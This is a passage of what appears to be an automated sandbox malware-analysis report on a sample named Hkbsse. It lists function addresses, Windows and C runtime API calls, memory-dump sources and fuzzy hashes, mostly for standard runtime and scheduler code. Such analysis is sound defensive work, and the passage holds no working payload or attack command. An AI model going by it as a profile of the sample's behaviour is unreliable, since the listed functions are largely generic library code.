                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: DA01C879604321AF97002BB9BC49FEB36ACA904716720043BF901D1293FE7CD849976C
                    Function 044B561D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044B5718
                    • type_info::operator==.LIBVCRUNTIME ref: 044B573F
                    • ___TypeMatch.LIBVCRUNTIME ref: 044B584B
                    • CatchIt.LIBVCRUNTIME ref: 044B58A0
                    • IsInExceptionSpec.LIBVCRUNTIME ref: 044B5926
                    • _UnwindNestedFrames.LIBCMT ref: 044B59AD
                    • CallUnexpected.LIBVCRUNTIME ref: 044B59C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 4234981820-393685449
                    • Opcode ID: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction ID: 722f910bf838467c6c8349a34855e48d12c0ebd2c92c0f7f05b1e2d132a3ffce
                    • Opcode Fuzzy Hash: c7b42c29d2e335d27d7f643697138232802a874451bb6807e5619385c900550a
                    • Instruction Fuzzy Hash: 8EC12871900209EBDF29DFA5C8809EEFBB5AF04329F04455BE8956B212D731E961CFE1
                    Function 00441B5C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00441815: CreateFileW.KERNEL32(00000000,00000000,?,00441C05,?,?,00000000,?,00441C05,00000000,0000000C), ref: 00441832
                    • GetLastError.KERNEL32 ref: 00441C70
                    • __dosmaperr.LIBCMT ref: 00441C77
                    • GetFileType.KERNEL32(00000000), ref: 00441C83
                    • GetLastError.KERNEL32 ref: 00441C8D
                    • __dosmaperr.LIBCMT ref: 00441C96
                    • CloseHandle.KERNEL32(00000000), ref: 00441CB6
                    • CloseHandle.KERNEL32(0043AD32), ref: 00441E03
                    • GetLastError.KERNEL32 ref: 00441E35
                    • __dosmaperr.LIBCMT ref: 00441E3C
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction ID: 112139b02b37b4a3a6abafbf4eec10d106d9ccfade03311548451970410361b9
                    • Opcode Fuzzy Hash: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction Fuzzy Hash: E2A14A32A142458FEF19DF68DC91BAE3BA1EB0A324F14015EF811AB3A1D7399C42C759
                    Function 00432A7E Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432A90
                      • Part of subcall function 004325EF: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432612
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432AB1
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432ABE
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00432B0C
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432BB4
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432BE6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: 5e49a0710176f9ffb610bd551467bf7c1da036f6e9237cc3336f808c64588d21
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: 99719030900209ABDF15DF54DA41ABFBBB2AF49304F04609AEC416B352C7B9DD16DB69
                    Function 044B2CE5 Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 044B2CF7
                      • Part of subcall function 044B2856: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 044B2879
                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 044B2D18
                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 044B2D25
                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 044B2D73
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 044B2E1B
                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 044B2E4D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                    • String ID:
                    • API String ID: 1256429809-0
                    • Opcode ID: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction ID: cca38fb206fdd1645ef2b7b7d0dc7778851a98da13d2ba7ed17d7c0def3a9eb5
                    • Opcode Fuzzy Hash: 5076e157b7bbdba4e4ef3fc0f50cf219b2f11a25ae551236d015c935f240817b
                    • Instruction Fuzzy Hash: AB71AD70900249ABEF15DF59C888AFF7B76BF45304F04409AEC816B392C7B5A816DBB1
                    Function 00426AEA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00426B2F
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426B61
                    • List.LIBCONCRT ref: 00426B9C
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426BAD
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00426BC9
                    • List.LIBCONCRT ref: 00426C04
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00426C15
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426C30
                    • List.LIBCONCRT ref: 00426C6B
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426C78
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426007
                      • Part of subcall function 00425FEF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426019
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 37c50e48faffa15a5835890cc86fa27e9627dd6e10cbd905bce2715576e74200
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 86517071B00229ABDB04DF55D595BEEB7B8FF08304F4140AAE9459B381DB38AE44CB94
                    Function 044A6D51 Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 044A6D96
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044A6DC8
                    • List.LIBCONCRT ref: 044A6E03
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044A6E14
                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 044A6E30
                    • List.LIBCONCRT ref: 044A6E6B
                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 044A6E7C
                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044A6E97
                    • List.LIBCONCRT ref: 044A6ED2
                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 044A6EDF
                      • Part of subcall function 044A6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044A626E
                      • Part of subcall function 044A6256: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 044A6280
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                    • String ID:
                    • API String ID: 3403738998-0
                    • Opcode ID: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction ID: 5da26a29e79220dd443114ff5bff9ed77c69f01c49d3b6f560ffc92d4f48915e
                    • Opcode Fuzzy Hash: 2f7af67c50368df58dbc42c7a39e667be4f9f9c44dd16b3d404a49fb0bf2eeba
                    • Instruction Fuzzy Hash: 84517171A00219AFEF14DF65C594BEEB7B8BF18348F45406AD945AB381DB30BE15CB90
                    Function 0043A5F9 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 0043A60F
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043A61B
                    • _free.LIBCMT ref: 0043A626
                    • _free.LIBCMT ref: 0043A631
                    • _free.LIBCMT ref: 0043A63C
                    • _free.LIBCMT ref: 0043A647
                    • _free.LIBCMT ref: 0043A652
                    • _free.LIBCMT ref: 0043A65D
                    • _free.LIBCMT ref: 0043A668
                    • _free.LIBCMT ref: 0043A676
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction ID: dafaea9898a024bbeaf4eb5fa5a9bd5eb26c9af27a77b3f713287ac740e7ce33
                    • Opcode Fuzzy Hash: faf1fab25e7e5356c3667d34395fc000b7ed69faf9a38d3f10eaeaa8788c76cd
                    • Instruction Fuzzy Hash: 5721EA76980208BFCB02EF95C882CDE7BB9BF08344F00556AF5559F121DB39EA58CB95
                    Function 00445B22 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447CAF), ref: 00445B3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction ID: 82c09db9cbec65f831423c8afe244374c316664d9e9191f84e2616e9823b9814
                    • Opcode Fuzzy Hash: dea9b2b477d79067893bb5005812e2be1a4e6301d490f468fa664dc5d61788b9
                    • Instruction Fuzzy Hash: 57518C70804E0ADBEF109F99E88C5AEBFB0FF05315F108157D981A6356CB788A19DF59
                    Function 00427474 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 004274C0
                    • SwitchToThread.KERNEL32(?), ref: 004274E3
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00427502
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0042751E
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00427529
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00427550
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
                    • String ID: count$ppVirtualProcessorRoots
                    • API String ID: 3791123369-3650809737
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: fc4521544dbb6807429d0765a6944cf8e671c5b6cf8d6aaa99cb8baaa305a527
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: B6218734B00325AFCB00EF55D595AAEBBB5BF05315F9040AAE901A7352DB38AE45CB58
                    Function 00426F2C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32 ref: 00426F46
                    • GetCurrentProcess.KERNEL32 ref: 00426F4E
                    • DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 00426F63
                    • SafeRWList.LIBCONCRT ref: 00426F83
                      • Part of subcall function 00424F7E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424F8F
                      • Part of subcall function 00424F7E: List.LIBCMT ref: 00424F99
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426F95
                    • GetLastError.KERNEL32 ref: 00426FA4
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426FBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                    • String ID: eventObject
                    • API String ID: 165577817-1680012138
                    • Opcode ID: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction ID: df3dab38d58adcbe0854f5ec81775a9d2d7f31f209f9ace54438c2a0d187fe5a
                    • Opcode Fuzzy Hash: f60108b339336b36486ca6d42982c1fe9e2fd9d4e50230e8ef23f6bb8518d1a3
                    • Instruction Fuzzy Hash: 7B110A75600215E7CB14EFA4ED49FEE33686F04301F614067F505E61D2DB389A04C66D
                    Function 00445772 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction ID: 0c802ae4ab2a979f088469e657098b65825bdc8a12ea5f1622e0d451203c6042
                    • Opcode Fuzzy Hash: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction Fuzzy Hash: 50C125B0E08B499FEF15DF99C881BAE7BB0AF49314F04415BE541AB383D7789901CB69
                    Function 0449C7C9 Relevance: 13.6, APIs: 9, Instructions: 138threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                    • String ID:
                    • API String ID: 3943753294-0
                    • Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction ID: e22189b54f917ab80af51881bc3a2960e6f775f2bcb4490a15065f00f2756322
                    • Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction Fuzzy Hash: 87515C35900605DFDF24DF64C5C5A6A7BF4BF08315B2444AEE8069B262DB30FD41EBA5
                    Function 004279F1 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A13
                      • Part of subcall function 00425DC8: __EH_prolog3_catch.LIBCMT ref: 00425DCF
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425E08
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427A21
                      • Part of subcall function 00426A2D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426A52
                      • Part of subcall function 00426A2D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426A75
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427A3A
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A46
                      • Part of subcall function 00425DC8: InterlockedPopEntrySList.KERNEL32(?), ref: 00425E51
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425E80
                      • Part of subcall function 00425DC8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425E8E
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427A92
                    • Concurrency::location::_Assign.LIBCMT ref: 00427AB3
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00427ABB
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427ACD
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00427AFD
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: b103386965f6d4094a94b484948c95d99d8643f9033d24ccfe4d2b4bf8a20aa7
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: 5A312430B082716ACF16AA7864927FF7BB59F41318F4400ABD442D7382DB2D5E0AC399
                    Function 044A7C58 Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044A7C7A
                      • Part of subcall function 044A602F: __EH_prolog3_catch.LIBCMT ref: 044A6036
                      • Part of subcall function 044A602F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044A606F
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 044A7C88
                      • Part of subcall function 044A6C94: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 044A6CB9
                      • Part of subcall function 044A6C94: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 044A6CDC
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044A7CA1
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044A7CAD
                      • Part of subcall function 044A602F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 044A60B8
                      • Part of subcall function 044A602F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 044A60E7
                      • Part of subcall function 044A602F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 044A60F5
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 044A7CF9
                    • Concurrency::location::_Assign.LIBCMT ref: 044A7D1A
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 044A7D22
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044A7D34
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 044A7D64
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: 26d8f123b79431d937f7b98f315174defe49b8b6f32ef1184be1406a34a601ef
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: 0F31E630B042556BEF35AE7844917FEBBB59F61708F0404AFC881D7342DB25A965C7D1
                    Function 00430A96 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00430AAC
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ABE
                    • GetCurrentThread.KERNEL32 ref: 00430AC6
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ACE
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425DBE,?), ref: 00430AE7
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00430B08
                      • Part of subcall function 00420321: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042033B
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425DBE,?), ref: 00430B1A
                    • GetLastError.KERNEL32(?,?,?,?,?,00425DBE,?), ref: 00430B45
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430B5B
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: d0b6aa9362e501fbcad66dfed5f34ccefc820da40d4b047d48024504de478199
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: E8113A75600301ABC710AFB5AD5AF9F77A89F09705F140176F949D6253EA78E800C779
                    Function 044B0CFD Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 044B0D13
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044A6025,?), ref: 044B0D25
                    • GetCurrentThread.KERNEL32 ref: 044B0D2D
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044A6025,?), ref: 044B0D35
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,044A6025,?), ref: 044B0D4E
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 044B0D6F
                      • Part of subcall function 044A0588: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044A05A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,044A6025,?), ref: 044B0D81
                    • GetLastError.KERNEL32(?,?,?,?,?,044A6025,?), ref: 044B0DAC
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044B0DC2
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
